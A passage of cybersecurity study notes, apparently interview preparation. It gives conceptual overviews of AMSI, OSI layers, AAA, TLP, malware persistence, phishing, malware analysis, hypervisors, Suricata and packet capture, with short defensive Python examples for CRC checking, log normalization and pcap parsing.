1. AMSI (Antimalware Scan Interface)

AMSI (Antimalware Scan Interface) is a Windows-based security feature that provides an interface for
applications and services to integrate with anti-malware software (like Windows Defender) for scanning
content. AMSI works primarily to detect and block malicious scripts and files at runtime.

How AMSI Works:

- Script Scanning: AMSI intercepts malicious scripts (e.g., PowerShell, JavaScript, VBScript)
before they are executed. It scans the code for known malicious patterns.
- Content Scanning: AMSI can be used by applications to scan files, emails, or other content
types for malware before execution or processing.
- Collaboration with Antivirus: AMSI integrates with the system’s antivirus solution (like Windows
Defender) to provide real-time scanning and respond to threats before they can be executed.

AMSI is often used in security solutions to block obfuscated or encoded scripts, which attackers often
use to hide malicious payloads.

2. Data Link Layer (OSI Model)

The Data Link Layer is the second layer of the OSI Model and is responsible for node-to-node data
transfer. It ensures that data is correctly transmitted between two devices on the same network and
handles error detection and correction at the frame level.

Functions of the Data Link Layer:

- Framing: The Data Link Layer organizes data into frames. A frame contains the data being
transmitted and necessary control information, such as the source and destination MAC
addresses.
- MAC (Media Access Control): This sublayer controls how devices on the same network gain
access to the physical medium and transmit data. It also includes addressing to identify devices
via MAC addresses.
- Error Detection and Correction: The Data Link Layer detects errors that may occur during
transmission using error detection techniques like CRC (Cyclic Redundancy Check). If errors
are detected, the frame may be discarded or retransmitted.
- Flow Control: Ensures that the sender does not overwhelm the receiver by regulating the pace
at which data is sent.

Sublayers of Data Link Layer:

- LLC (Logical Link Control): Manages communication between upper layers and the Data Link
Layer, allowing multiple protocols to operate over the same physical medium.
- MAC (Media Access Control): Manages how devices on a network share and access the
network medium.
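The CRC error detection described under Functions of the Data Link Layer, worked through on a simplified Ethernet II frame: the sender appends a CRC-32 frame check sequence, the receiver recomputes it, and a single flipped bit is caught. This is an added example, not from the study material; the MAC addresses and payload are constructed, and the bitwise CRC-32 matches the polynomial used by Ethernet (check value 0xCBF43926 for the bytes "123456789").

```python
import struct

CRC32_POLY = 0xEDB88320   # reflected form of the CRC-32 polynomial used by Ethernet's FCS


def crc32(data: bytes) -> int:
    """Bitwise CRC-32 (same values as zlib.crc32); slow but shows the shift-and-xor idea."""
    crc = 0xFFFFFFFF
    for byte in data:
        crc ^= byte
        for _ in range(8):
            crc = (crc >> 1) ^ CRC32_POLY if crc & 1 else crc >> 1
    return crc ^ 0xFFFFFFFF


def build_frame(dst_mac: bytes, src_mac: bytes, ethertype: int, payload: bytes) -> bytes:
    """Simplified Ethernet II frame: 6+6 byte MACs, 2 byte EtherType, payload, then the
    4 byte FCS (CRC-32 over everything before it, appended little-endian)."""
    if len(dst_mac) != 6 or len(src_mac) != 6:
        raise ValueError("MAC addresses must be 6 bytes")
    body = dst_mac + src_mac + struct.pack("!H", ethertype) + payload
    return body + struct.pack("<I", crc32(body))


def check_frame(frame: bytes) -> bool:
    """Receiver side: recompute the CRC over the frame minus its FCS and compare.
    A mismatch means the frame is discarded (or retransmitted by a higher layer)."""
    if len(frame) < 18:               # 14 byte header + 4 byte FCS at minimum
        return False
    body, fcs = frame[:-4], frame[-4:]
    return struct.unpack("<I", fcs)[0] == crc32(body)


def flip_bit(frame: bytes, bit_index: int) -> bytes:
    """Simulate a single-bit error on the wire."""
    buf = bytearray(frame)
    buf[bit_index // 8] ^= 1 << (bit_index % 8)
    return bytes(buf)


# Constructed, locally administered MAC addresses and the IPv4 EtherType (0x0800).
DST = bytes.fromhex("020000000001")
SRC = bytes.fromhex("020000000002")
FRAME = build_frame(DST, SRC, 0x0800, b"constructed payload bytes")

if __name__ == "__main__":
    print("clean frame ok:", check_frame(FRAME))
    print("after bit flip:", check_frame(flip_bit(FRAME, 100)))
```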

3. AAA (Authentication, Authorization, and Accounting)

AAA is a framework used to manage and control access to resources in a network. It ensures that
users are properly authenticated, authorized to access certain resources, and their activities are
tracked.

Components of AAA:

- Authentication: This step verifies the identity of the user or device. Common methods include
usernames and passwords, certificates, or biometric data.
- Example: When you log into a network using your credentials, authentication ensures
you are who you claim to be.
- Authorization: After successful authentication, authorization determines what resources the
authenticated user or device can access and what actions they can perform.
- Example: A user may be authorized to access certain files or systems but restricted from
accessing others.
- Accounting: Tracks and logs user actions, including when they logged in, what resources they
accessed, and the duration of their session. This data is useful for audits and monitoring.
- Example: Accounting records may show that a user accessed confidential data or used
excessive network bandwidth.

4. TLP (Traffic Light Protocol)

TLP (Traffic Light Protocol) is a system used for sharing sensitive information within a controlled
environment. It defines how the shared information can be used and disseminated based on four color
codes: red, amber, green, and white.

TLP Color Codes:

- TLP:RED: The most restricted level. Information labeled as RED should only be shared with the
original recipients, and not beyond, even within the same organization. Typically used for highly
sensitive information.
- TLP:AMBER: Information can be shared with specific groups within the organization, but not
externally without the provider’s consent. This is often used for information that needs to be
protected but can be shared within certain circles.
- TLP:GREEN: Information can be shared with the organization and trusted partners, but not
made public. It’s used for information that is sensitive but doesn't pose a serious risk if shared
with a wider, but still limited, audience.
- TLP:WHITE: Information can be freely shared and made public. There are no restrictions on
distribution.

TLP is commonly used in incident response, threat intelligence sharing, and cybersecurity coordination
between organizations.

5. TTP (Tactics, Techniques, and Procedures)

TTP is a framework used in cybersecurity to describe the behavior and methods attackers use to
accomplish their goals. By understanding TTPs, organizations can better identify and respond to cyber
threats.

Components of TTP:

- Tactics: The high-level objectives or goals that attackers are trying to achieve. This could be
gaining initial access, persistence, or data exfiltration.
- Example: A tactic may be to establish persistence in the system.
- Techniques: Specific methods attackers use to achieve their tactics. Techniques are more
concrete than tactics and describe how a particular goal is carried out.
- Example: A technique for achieving persistence could be creating a malicious service
that starts on boot.
- Procedures: The detailed processes or steps attackers use to implement techniques. These
may vary depending on the target or the tools available to the attacker.
- Example: A procedure might involve using a specific tool like Mimikatz to extract
passwords from a system.

TTPs help defenders to anticipate the methods attackers might use and to build detection mechanisms
based on observed behaviors. TTPs are often mapped out in frameworks like the MITRE ATT&CK.

---------------------------------------------------------------------------------------------------------------------------------------------------

***************************************************************
---------------------------------------------------------------------------------------------------------------------------------------------------
Finding whether fingerprinting is malicious or not, with a basic example
Hiding malware in software
Fileless Malware
Automatic Malware Analysis
Data aggregation, normalization, parsing
Macros in documents
Web Common Attack Types
APT

1. Determining Whether Fingerprinting Is Malicious (with a Basic Example)

Fingerprinting is a technique where attackers gather information about a target system, application, or
network, often in preparation for an attack. It can be legitimate (used by websites to detect browsers or
operating systems) or malicious (used by attackers to collect information to exploit vulnerabilities).

Basic Example of Fingerprinting:

- Legitimate Fingerprinting: A website collects browser details (e.g., type, version, language,
installed plugins) to serve the right content (like a mobile-optimized site).
- Malicious Fingerprinting: A malicious website or attacker can use fingerprinting to gather
information about the browser, operating system, IP address, and installed software versions to
find vulnerabilities.

How to Detect Malicious Fingerprinting:

- Unusual Network Traffic: Look for unexpected outbound traffic from your system to unknown
or suspicious domains. Malicious fingerprinting scripts often attempt to exfiltrate data to external
servers.
- Suspicious Requests: Check for abnormal HTTP requests, such as a large number of
requests for information about system attributes that are unnecessary for legitimate purposes
(e.g., requests for installed plugins, fonts, screen resolution).
- Antivirus/Anti-malware Alerts: Modern security solutions can detect known fingerprinting
scripts that are used for reconnaissance.

2. Hiding Malware in Software

Malware can be hidden within legitimate software using various techniques, making it harder for users
to detect its presence. This is a common method used in both targeted attacks and widespread
malware campaigns.

Techniques for Hiding Malware:

- Trojanized Software: Attackers bundle malware with legitimate software. When the user
installs the software, both the legitimate application and the malware are installed. Examples
include downloading cracked software or fake versions of popular applications.
- Steganography: Malware can be hidden inside seemingly benign files (e.g., images or videos).
The malicious code is executed when the file is opened by a specially crafted program.
- Code Injection: Malware can be injected into a legitimate running process, allowing it to hide
within the memory space of trusted applications, making detection harder.
- Supply Chain Attacks: Attackers infect the software during the development or distribution
process. An example is the SolarWinds attack, where malicious code was introduced into the
software update of a widely-used IT management tool.

3. Fileless Malware

Fileless Malware refers to a type of malware that does not rely on traditional files to infect a system.
Instead, it operates directly in the memory of the target system, leaving little to no trace on the hard
drive, making it more difficult to detect.

How Fileless Malware Works:

- Memory-based Attacks: The malware resides in the system’s RAM and disappears once the
system is rebooted.
- Exploiting Legitimate Tools: Fileless malware often uses trusted tools like PowerShell or WMI
(Windows Management Instrumentation) to carry out malicious actions. Since these tools are
commonly used in legitimate operations, it becomes harder to identify the malicious activity.
- No Executable Files: Unlike traditional malware that relies on an executable file (e.g., `.exe`),
fileless malware operates by exploiting vulnerabilities in running processes or legitimate
applications.
- Example: An attacker uses PowerShell to download a malicious script directly into
memory, executing it without saving the script to disk. Traditional antivirus software may
miss it since no file is written.

4. Automatic Malware Analysis

Automatic Malware Analysis involves using automated tools and sandboxes to detect and analyze
malware without manual intervention. This is essential in handling the massive volume of malware
samples generated daily.

Key Components of Automatic Malware Analysis:

- Static Analysis: The malware’s code and structure are analyzed without executing it. This
includes scanning for known signatures, analyzing file headers, and extracting embedded URLs
or strings.
- Dynamic Analysis: The malware is executed in a controlled environment (sandbox) to observe
its behavior, such as changes to files, network communications, or registry modifications.
- Behavioral Analysis: Monitors how the malware behaves when executed, such as whether it
tries to access certain files, spawn processes, or communicate with a command-and-control
server.
- Example of Tools:
- Cuckoo Sandbox: An open-source automated malware analysis system that provides
detailed behavior reports after executing suspicious files in a virtual environment.
- VirusTotal: A platform that scans files using multiple antivirus engines and provides
reports based on both signature and behavioral analysis.

5. Data Aggregation, Normalization, and Parsing

These are key processes in cybersecurity for dealing with logs, events, and other data collected from
various sources.

- Data Aggregation: Collecting data from different sources such as firewalls, endpoint logs,
IDS/IPS, and applications. The goal is to consolidate information for centralized analysis.
- Normalization: Converting diverse data formats into a consistent and standard format so that it
can be processed and analyzed uniformly. For example, logs from different devices may use
different time formats or terminologies, so normalization ensures they are all converted to a
standard format.
- Parsing: Breaking down and interpreting the raw log data into individual components (e.g.,
timestamp, IP address, action) so that it can be indexed and queried.

These steps are often handled by SIEM systems (Security Information and Event Management) to
identify patterns and detect security threats across different sources of data.
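
As an added example (not part of these notes), the following Python script performs the three steps on constructed sample lines from a firewall, a Windows host and a web server: each source has its own parser, every event is normalized to one schema with UTC ISO-8601 timestamps, and the aggregated list can then be queried across sources. The log lines, the assumed syslog year and the field names of the common schema are all constructed for the example.

```python
import re
from collections import Counter
from datetime import datetime, timezone

# Constructed sample log lines (not real telemetry) from three sources that each
# use a different timestamp format and their own vocabulary for "denied".
RAW_LOGS = [
    ("firewall", "Mar  3 14:02:17 fw01 kernel: DROP IN=eth0 OUT= SRC=203.0.113.5 "
                 "DST=198.51.100.10 PROTO=TCP SPT=44512 DPT=22"),
    ("windows", "03/03/2024 02:02:19 PM EventID=4625 Source=10.0.0.7 TargetUser=admin"),
    ("nginx", '10.0.0.7 - - [03/Mar/2024:14:02:21 +0000] "GET /admin HTTP/1.1" 403 154'),
]

ASSUMED_SYSLOG_YEAR = 2024  # syslog timestamps carry no year; assumption for the example


def iso(ts):
    """Normalized timestamp: everything becomes UTC ISO-8601 with a 'Z' suffix."""
    return ts.astimezone(timezone.utc).strftime("%Y-%m-%dT%H:%M:%SZ")


def parse_firewall(line):
    """iptables-style kernel log: syslog timestamp followed by key=value fields."""
    m = re.match(r"(\w{3}\s+\d+ \d\d:\d\d:\d\d) \S+ kernel: (\w+) .*?SRC=(\S+) DST=(\S+) "
                 r"PROTO=(\w+) SPT=(\d+) DPT=(\d+)", line)
    if not m:
        return None
    ts = datetime.strptime(m.group(1), "%b %d %H:%M:%S").replace(
        year=ASSUMED_SYSLOG_YEAR, tzinfo=timezone.utc)
    return {"timestamp": iso(ts), "source": "firewall", "event": "network_connection",
            "src_ip": m.group(3), "dst_ip": m.group(4), "user": None,
            "action": "deny" if m.group(2) in ("DROP", "REJECT") else "allow",
            "detail": f"{m.group(5)}/{m.group(7)}"}


def parse_windows(line):
    """Windows-style event: US date with AM/PM (assumed to be UTC), key=value fields."""
    m = re.match(r"(\d\d/\d\d/\d{4} \d\d:\d\d:\d\d [AP]M) (.*)", line)
    if not m:
        return None
    ts = datetime.strptime(m.group(1), "%m/%d/%Y %I:%M:%S %p").replace(tzinfo=timezone.utc)
    fields = dict(kv.split("=", 1) for kv in m.group(2).split())
    event_id = fields.get("EventID")
    return {"timestamp": iso(ts), "source": "windows",
            "event": "logon" if event_id in ("4624", "4625") else f"event_{event_id}",
            "src_ip": fields.get("Source"), "dst_ip": None, "user": fields.get("TargetUser"),
            "action": "deny" if event_id == "4625" else "allow", "detail": f"EventID={event_id}"}


def parse_nginx(line):
    """Common Log Format: bracketed timestamp with explicit UTC offset."""
    m = re.match(r'(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+) [^"]*" (\d{3}) \d+', line)
    if not m:
        return None
    ts = datetime.strptime(m.group(2), "%d/%b/%Y:%H:%M:%S %z")
    status = int(m.group(5))
    return {"timestamp": iso(ts), "source": "nginx", "event": "http_request",
            "src_ip": m.group(1), "dst_ip": None, "user": None,
            "action": "deny" if status in (401, 403) else "allow",
            "detail": f"{m.group(3)} {m.group(4)} {status}"}


PARSERS = {"firewall": parse_firewall, "windows": parse_windows, "nginx": parse_nginx}


def normalize_all(raw_logs):
    """Aggregation + normalization: every line goes through its source's parser and
    comes out in the common schema; the result is one time-ordered event list."""
    events = []
    for source, line in raw_logs:
        event = PARSERS[source](line)
        if event is not None:
            events.append(event)
    return sorted(events, key=lambda e: e["timestamp"])


def denied_by_source_ip(events):
    """A query that only works after normalization: denied actions per client
    address, regardless of which device reported them."""
    return Counter(e["src_ip"] for e in events if e["action"] == "deny")


if __name__ == "__main__":
    normalized = normalize_all(RAW_LOGS)
    for event in normalized:
        print(event)
    print(denied_by_source_ip(normalized))
```

Once the three sources share one schema, the failed logon and the 403 from 10.0.0.7 line up by timestamp and source address, which is exactly the kind of cross-source pattern a SIEM correlation rule is written against.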

6. Macros in Documents

Macros are scripts embedded in documents (such as Word or Excel files) that automate repetitive
tasks. While macros can be useful for legitimate purposes, they are often exploited by attackers to
deliver malware.

Macro-based Malware:

- How it Works: An attacker creates a document with a malicious macro, and when the user
opens the document and enables macros, the malicious code is executed. This code could
download malware, steal data, or perform other harmful actions.
- Example: A phishing email may contain an attached Word document with a macro. When the
victim opens the document and enables macros, the malware is downloaded and executed.
- Mitigation: Disabling macros by default and only enabling them from trusted sources is a
common defense against macro-based attacks.

7. Common Web Attack Types

Web applications are frequently targeted by various attack types. Below are some of the most common
ones:

- SQL Injection: Attackers inject malicious SQL queries into a vulnerable web application’s input
fields to manipulate the database, potentially gaining access to sensitive data or bypassing
authentication.
- Cross-Site Scripting (XSS): Attackers inject malicious scripts into web pages viewed by other
users. The script runs in the user's browser, potentially stealing cookies, session tokens, or
executing actions on behalf of the user.
- Cross-Site Request Forgery (CSRF): An attacker tricks a user into executing unwanted
actions on a web application in which the user is authenticated. For example, clicking a
malicious link could result in transferring funds from the user’s account without their consent.
- Directory Traversal: This attack exploits vulnerabilities to access files outside the web server’s
root directory, allowing attackers to view or execute sensitive files.
- File Upload Vulnerabilities: Attackers upload malicious files to the server, leading to code
execution or unauthorized access.

8. APT (Advanced Persistent Threat)

APT (Advanced Persistent Threat) refers to a highly sophisticated, long-term cyber attack carried out by
a skilled and well-resourced attacker, often targeting specific organizations or governments for political
or financial gain.

Characteristics of APTs:

- Advanced: The attacker uses a combination of various tools, techniques, and exploits, often
custom-built for the target.
- Persistent: The attacker remains undetected for a prolonged period to achieve their goal, which
is often data theft, espionage, or disruption of critical infrastructure.
- Threat: APTs are typically carried out by organized groups, such as nation-states or
cybercriminal gangs, with the capability to carry out large-scale and coordinated attacks.

APT Lifecycle:

1. Initial Compromise: Gaining access through methods like phishing, exploiting vulnerabilities, or
social engineering.
2. Establishing Foothold: Installing backdoors or malware to maintain access.
3. Escalating Privileges: Gaining higher-level permissions to access sensitive data or systems.
4. Internal Reconnaissance: Mapping the internal network to locate valuable assets.
5. Data Exfiltration: Transferring sensitive data out of the network.
6. Covering Tracks: Hiding evidence of the attack to remain undetected.

Examples of APT groups include APT28 (Fancy Bear), a Russian-based cyber-espionage group, and
APT33, an Iranian state-sponsored threat actor.
Always question HOW, WHAT & WHY?

---------------------------------------------------------------------------------------------------------------------------------------------------

***************************************************************
---------------------------------------------------------------------------------------------------------------------------------------------------

Persistence
How malware attacks persist in the network
Biggest IT Outage
Phishing Mail
Static Malware Analysis
Dynamic Malware Analysis
Hybrid Malware Analysis
Hypervisor

1. Persistence (in Malware Attacks)

Persistence refers to the techniques malware uses to maintain long-term access to a system, even
after reboots, software updates, or user logouts. The goal of persistence is to ensure that the malware
can continue its operation without being easily removed or detected.

Common Persistence Techniques:

- Startup Items: Malware may add itself to startup programs or registry entries, ensuring it runs
every time the system boots.
- Example: Adding malicious code to the `Run` key in the Windows Registry
(`HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run`).
- Scheduled Tasks: Malware may create scheduled tasks (e.g., via Windows Task Scheduler) that
execute malicious code at set intervals or system events.
- Service Installation: Malware can install itself as a service that starts automatically during
system boot, such as creating a Windows service that restarts the malware whenever it is
stopped.
- DLL Hijacking: Attackers place malicious Dynamic Link Libraries (DLLs) in locations where
legitimate programs expect them, making the operating system execute the malicious code
during program startup.
- Web Shells: In web environments, attackers may install web shells to maintain remote access to
compromised web servers even if the server is rebooted.

2. How Malware Persists in a Network

Once malware successfully infiltrates a network, it uses various techniques to ensure long-term control
and continued access:

Techniques for Network Persistence:

- Lateral Movement: After gaining access to one machine, malware moves across the network to
infect additional systems. It might use stolen credentials or exploit vulnerabilities in other
devices to spread.
- Credential Dumping: Malware often attempts to steal login credentials (e.g., using tools like
Mimikatz) and use them to authenticate and maintain access to other machines in the network.
- Domain Admin Account Access: By obtaining domain admin rights, attackers can control and
manipulate all devices in the domain, ensuring persistence across the network.
- Backdoor Installation: The malware installs backdoors on multiple machines, allowing the
attacker to regain access even if the original infection point is detected and removed.
- Network Traffic Manipulation: Malware can manipulate DNS or ARP (Address Resolution
Protocol) tables to route traffic through malicious proxies or maintain control over network flows.

3. Biggest IT Outage

The Biggest IT Outage could refer to major network failures or cyberattacks that disrupted services
across large organizations or even countries. Here are some significant examples:

- Facebook Outage (October 2021): A configuration change caused Facebook, Instagram,
WhatsApp, and other services to go offline for several hours. This was one of the largest global
outages, affecting millions of users worldwide.
- Dyn DDoS Attack (October 2016): A Distributed Denial-of-Service (DDoS) attack targeted DNS
provider Dyn, causing major websites like Twitter, Reddit, GitHub, and Netflix to go offline. This
was one of the most significant outages, caused by the Mirai Botnet, which used infected IoT
devices to launch the attack.
- British Airways (2017): A power failure led to a massive IT outage for British Airways, grounding
flights and affecting tens of thousands of passengers. The outage was reported to have cost the
airline over £80 million.

These examples show how complex IT infrastructures are susceptible to human error, cyberattacks, or
power failures, leading to widespread disruption.

4. Phishing Mail

Phishing Mail is a type of cyberattack in which attackers send deceptive emails designed to trick the
recipient into revealing sensitive information, such as login credentials, or downloading malware.

Key Features of a Phishing Email:

- Deceptive Sender: The email appears to come from a trusted source, such as a bank,
colleague, or service provider, but the sender’s address may be slightly altered (e.g.,
`[email protected]` instead of `[email protected]`).
- Urgent Language: Phishing emails often create a sense of urgency, such as warning the
recipient that their account has been compromised or that they need to act immediately to avoid
penalties.
- Malicious Links or Attachments: The email may contain links that lead to a fake website
designed to steal login credentials or download malware. Attachments can also contain
malicious payloads (e.g., trojans, ransomware).
- Examples:
- A fake email from "Microsoft Support" asking you to reset your password by clicking on a
suspicious link.
- An email from a fake "HR department" asking you to download and sign a malicious
attachment disguised as a company policy document.

5. Static Malware Analysis

Static Malware Analysis involves analyzing the malware without executing it. This is a safer method that
focuses on examining the structure, code, and metadata of the file to understand its functionality.

Steps in Static Malware Analysis:

- File Inspection: Identifying file type, size, and structure (e.g., PE file for Windows). Tools like
PEiD and Die help determine if the file is packed or obfuscated.
- Signature-Based Detection: Scanning the malware file against a database of known signatures
to identify if the sample matches any known malware variants (using tools like VirusTotal).
- Disassembly: Using a disassembler (e.g., IDA Pro) to convert the machine code into
human-readable assembly code. Analysts review this to understand the malware’s logic and
function.
- String Analysis: Searching for readable strings within the malware using tools like Strings to find
URLs, commands, or text that indicate its behavior or target.

Limitations:

- Static analysis can be thwarted by packing, encryption, or obfuscation techniques that hide the
true code or logic of the malware.

6. Dynamic Malware Analysis

Dynamic Malware Analysis involves running the malware in a controlled environment (sandbox) to
observe its behavior in real-time. This method is useful for seeing exactly how the malware interacts
with the system and network.

Steps in Dynamic Malware Analysis:

- Sandbox Execution: The malware is executed in a virtualized or sandboxed environment, where
its actions (e.g., file creation, network communication, process spawning) are monitored.
- Behavioral Observation: Analysts track the malware’s behavior, such as file modifications,
registry changes, system process injection, and network connections.
- Network Traffic Monitoring: The malware’s network behavior is captured using tools like
Wireshark to analyze whether it connects to external command-and-control servers or attempts
to exfiltrate data.
- API Calls: Monitoring system API calls using tools like Procmon to see what actions the
malware takes, such as reading or writing to disk, creating processes, or modifying system
settings.

Advantages:

- Dynamic analysis can reveal the real behavior of obfuscated or packed malware,
especially when static analysis is ineffective.

7. Hybrid Malware Analysis

Hybrid Malware Analysis combines both static and dynamic analysis techniques. The goal is to
leverage the benefits of both methods to gain a more comprehensive understanding of malware
behavior.

How Hybrid Analysis Works:

- Initial Static Analysis: The malware is first examined using static techniques to extract basic
information (e.g., file type, metadata) and identify possible indicators of compromise (IoCs).
- Followed by Dynamic Analysis: The malware is executed in a sandbox to observe its real-time
behavior, providing insight into actions like network connections or changes to system files.
- Combination: By combining both approaches, analysts can correlate the file’s code structure
with its observed behaviors, providing a fuller picture of its functionality and potential impact.

Advantages:

- Static analysis gives an early understanding of the malware’s structure, while dynamic analysis
confirms its actual behavior. Together, they offer a more complete malware analysis.

8. Hypervisor

A Hypervisor, also known as a Virtual Machine Monitor (VMM), is software that creates and runs virtual
machines (VMs). A hypervisor allows multiple virtualized operating systems to run on a single physical
machine, sharing its hardware resources.

Types of Hypervisors:

- Type 1 (Bare-Metal Hypervisors): These run directly on the physical hardware, without requiring
a host operating system. Examples include VMware ESXi, Microsoft Hyper-V, and Xen.
- Type 2 (Hosted Hypervisors): These run on top of an existing operating system and manage
virtual machines as applications. Examples include VMware Workstation, Oracle VirtualBox, and
Parallels Desktop.

Functions of a Hypervisor:

- Resource Allocation: The hypervisor allocates resources like CPU, memory, and storage
between virtual machines.
- Isolation: Virtual machines are isolated from each other, meaning that if one crashes or is
compromised, it doesn’t affect the others.
- Virtual Networking: Hypervisors provide virtual networking capabilities, allowing VMs to
communicate with each other or the outside world through virtual switches and network
interfaces.

Use Cases:

- Hypervisors are commonly used in data centers to run multiple virtualized servers on the same
hardware, allowing for more efficient resource utilization.
- In cybersecurity, hypervisors are used to create sandbox environments for malware analysis.

---------------------------------------------------------------------------------------------------------------------------------------------------

***************************************************************
---------------------------------------------------------------------------------------------------------------------------------------------------
Emerging threats Suricata
Wireshark & TCPDUMP
MITRE D3FEND
Artifact
LOLBAS
Why malware analysis used according to different roles
Showing credential stores in cookie
NAT
SNAT
DNAT
PAT
VPN working
IPSEC Protocol

1. Emerging Threats Suricata

Suricata is an open-source network security monitoring engine that serves as an intrusion detection
system (IDS), intrusion prevention system (IPS), and network security monitoring (NSM) tool. Emerging
Threats refers to a set of signature rules that are continuously updated to detect new and sophisticated
attack patterns.

Suricata & Emerging Threats:

- Suricata: It inspects network traffic and detects suspicious activity based on signature-based,
anomaly-based, and protocol-based analysis.
- Emerging Threats: The Emerging Threats (ET) community provides a comprehensive rule set
for Suricata that includes detection for known and zero-day threats. These rule sets evolve
quickly to counter new attack vectors such as malware, exploits, phishing, ransomware, and
advanced persistent threats (APTs).

Why It’s Important:

- Emerging threats detection helps organizations stay ahead of cyber attackers by using
up-to-date signatures to identify the latest tactics, techniques, and procedures (TTPs).
- Suricata with ET rules provides real-time network analysis and offers better visibility into
potential threats.

2. Wireshark & TCPDUMP

Wireshark and TCPDUMP are powerful network packet analysis tools used for capturing and analyzing
network traffic.

Wireshark:

- A graphical network protocol analyzer that allows users to capture live network traffic and
analyze it in detail. Wireshark is used for identifying network issues, debugging protocols, and
detecting suspicious activities.
- Features:
- Packet filtering and dissection of hundreds of network protocols.
- A graphical interface that shows detailed information about each captured packet.
- Ability to highlight anomalies or abnormal patterns in the network traffic.

TCPDUMP:

- A command-line packet capturing tool used to intercept and display network packets transmitted
over a network. It provides similar functionality to Wireshark but operates via the command line
and lacks the graphical interface.
- Features:
- Lightweight and efficient for real-time traffic capture.
- Advanced packet filtering options with BPF (Berkeley Packet Filter) syntax.
- Typically used on Linux or UNIX-based systems for quick packet analysis.

Use Cases:

- Wireshark: Deep dive into packet-level data with a user-friendly interface, great for detailed
protocol analysis.
- TCPDUMP: Quick packet capture and troubleshooting, especially in environments where using
a GUI is not feasible.
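
Both tools read the same pcap file format, and a filter such as `tcp port 80` is just a selection over the dissected fields. As an added example (not from these notes, and not code from either project), the Python script below builds a three-frame capture in memory, walks the pcap record headers, dissects Ethernet, IPv4, TCP and UDP by hand, applies a tcpdump-style filter, and prints one summary line per packet in tcpdump's style. The frames, addresses, ports and payloads are constructed; checksums are left at zero and are not verified.

```python
import ipaddress
import struct
from datetime import datetime, timezone

ETH_HEADER = struct.pack("!6s6sH", b"\x02\x00\x00\x00\x00\x01", b"\x02\x00\x00\x00\x00\x02", 0x0800)
TCP_FLAG_LETTERS = ((0x01, "F"), (0x02, "S"), (0x04, "R"), (0x08, "P"), (0x10, "."))


def build_sample_pcap():
    """Constructed capture (not real traffic): a SYN to port 22, an HTTP request on
    port 80 and a DNS query, all from 10.0.0.7. Checksum fields are zero."""
    def ip(proto, payload, src="10.0.0.7", dst="198.51.100.10"):
        return struct.pack("!BBHHHBBH4s4s", 0x45, 0, 20 + len(payload), 0x1234, 0x4000, 64, proto, 0,
                           ipaddress.IPv4Address(src).packed, ipaddress.IPv4Address(dst).packed) + payload

    def tcp(sport, dport, flags, data=b""):
        return struct.pack("!HHIIBBHHH", sport, dport, 1000, 0, 5 << 4, flags, 65535, 0, 0) + data

    def udp(sport, dport, data):
        return struct.pack("!HHHH", sport, dport, 8 + len(data), 0) + data

    frames = [
        (1709474537.000, ETH_HEADER + ip(6, tcp(44512, 22, 0x02))),                        # SYN
        (1709474538.250, ETH_HEADER + ip(6, tcp(44513, 80, 0x18, b"GET / HTTP/1.1\r\nHost: x\r\n\r\n"))),
        (1709474539.500, ETH_HEADER + ip(17, udp(53011, 53, b"\x00\x01" + b"\x00" * 10), dst="10.0.0.53")),
    ]
    out = struct.pack("<IHHiIII", 0xA1B2C3D4, 2, 4, 0, 0, 65535, 1)   # global header, LINKTYPE_ETHERNET
    for ts, frame in frames:
        sec = int(ts)
        out += struct.pack("<IIII", sec, int(round((ts - sec) * 1_000_000)), len(frame), len(frame)) + frame
    return out


def dissect(frame, ts):
    """Ethernet -> IPv4 -> TCP/UDP; returns the fields tcpdump prints for a packet."""
    pkt = {"ts": ts, "proto": "other", "src": None, "dst": None, "sport": None, "dport": None,
           "flags": "", "payload": b""}
    if struct.unpack_from("!H", frame, 12)[0] != 0x0800:      # not IPv4: leave it undissected
        return pkt
    ihl = (frame[14] & 0x0F) * 4
    proto = frame[14 + 9]
    pkt["src"] = str(ipaddress.IPv4Address(frame[26:30]))
    pkt["dst"] = str(ipaddress.IPv4Address(frame[30:34]))
    t = 14 + ihl                                                # start of the transport header
    if proto == 6:
        sport, dport = struct.unpack_from("!HH", frame, t)
        data_off = (frame[t + 12] >> 4) * 4
        flags = frame[t + 13]
        pkt.update(proto="tcp", sport=sport, dport=dport, payload=frame[t + data_off:],
                   flags="[" + "".join(l for bit, l in TCP_FLAG_LETTERS if flags & bit) + "]")
    elif proto == 17:
        sport, dport, length = struct.unpack_from("!HHH", frame, t)
        pkt.update(proto="udp", sport=sport, dport=dport, payload=frame[t + 8:t + length])
    return pkt


def parse_pcap(data):
    """Walk the pcap global header and per-record headers (both byte orders)."""
    magic = struct.unpack_from("<I", data)[0]
    endian = "<" if magic == 0xA1B2C3D4 else ">"               # 0xD4C3B2A1 means big-endian file
    if struct.unpack_from(endian + "I", data, 20)[0] != 1:
        raise ValueError("only Ethernet (LINKTYPE 1) captures are handled here")
    packets, off = [], 24
    while off + 16 <= len(data):
        sec, usec, incl_len, _ = struct.unpack_from(endian + "IIII", data, off)
        packets.append(dissect(data[off + 16:off + 16 + incl_len], sec + usec / 1_000_000))
        off += 16 + incl_len
    return packets


def filter_packets(packets, proto=None, port=None, host=None):
    """The selection tcpdump's 'tcp port 80' or 'host 10.0.0.7' expresses in BPF."""
    return [p for p in packets
            if (proto is None or p["proto"] == proto)
            and (port is None or port in (p["sport"], p["dport"]))
            and (host is None or host in (p["src"], p["dst"]))]


def summary_line(p):
    """One line in the style of tcpdump's default output."""
    when = datetime.fromtimestamp(p["ts"], timezone.utc).strftime("%H:%M:%S.%f")
    return (f"{when} IP {p['src']}.{p['sport']} > {p['dst']}.{p['dport']}: "
            f"{p['proto'].upper()} {p['flags']} length {len(p['payload'])}")


if __name__ == "__main__":
    for packet in filter_packets(parse_pcap(build_sample_pcap()), proto="tcp"):
        print(summary_line(packet))
```

Wireshark shows the same fields in its packet-detail pane; the value of writing the dissector once by hand is knowing which byte each filter actually tests.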

3. MITRE D3FEND

MITRE D3FEND is a knowledge base framework that focuses on defensive countermeasures in
cybersecurity. It complements the MITRE ATT&CK framework, which focuses on adversary tactics and
techniques.

Key Concepts of MITRE D3FEND:

- Proactive Defense: It helps defenders understand how to prevent or disrupt attacker behaviors
by offering specific defensive techniques.
- Mapping Defensive Techniques: Similar to how ATT&CK maps adversary techniques, D3FEND
maps defensive capabilities such as network segmentation, malware analysis, monitoring, and
deception techniques.

Why It’s Important:

- It provides a systematic approach for security teams to build and assess their defenses against
known adversary tactics.
- MITRE D3FEND can be used to prioritize defensive investments based on likely attack patterns
and threat models.

4. Artifact

